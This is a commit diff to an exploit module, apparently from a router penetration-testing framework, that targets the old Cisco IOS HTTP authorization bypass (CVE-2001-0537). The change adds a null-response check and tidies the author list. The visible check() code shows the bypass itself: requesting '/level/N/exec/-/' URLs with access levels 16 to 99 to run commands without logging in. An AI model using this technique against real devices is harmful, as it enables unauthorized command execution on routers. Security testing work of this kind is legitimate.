Cisco IOS HTTP Auth Bypass exploit little fixes

h0wl · Apr 18, 2017 · 772cc62 · 772cc62
1 parent db81c41
commit 772cc62
Showing 1 changed file with 2 additions and 2 deletions.
diff --git a/...co/cisco_ios_http_authorization_bypass.py → ...ts/cisco/ios_http_authorization_bypass.py b/...co/cisco_ios_http_authorization_bypass.py → ...ts/cisco/ios_http_authorization_bypass.py
@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
                        'to bypass authentication and execute arbitrary commands, '
                        'when local authorization is being used, by specifying a high access level in the URL.',
         'authors': [
-            'Author', 'renos stoikos <rstoikos[at]gmail.com>'  # routesploit module
+            'renos stoikos <rstoikos[at]gmail.com>'  # routesploit module
         ],
         'references': [
             'http://www.cvedetails.com/cve/cve-2001-0537',
@@ -44,7 +44,7 @@ def check(self):
         for num in range(16, 100):
             url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
             response = http_request(method="GET", url=url)
-            if response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
+            if response is not None and response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
                 self.access_level = num
                 return True  # target is vulnerable
         return False  # target is not vulnerable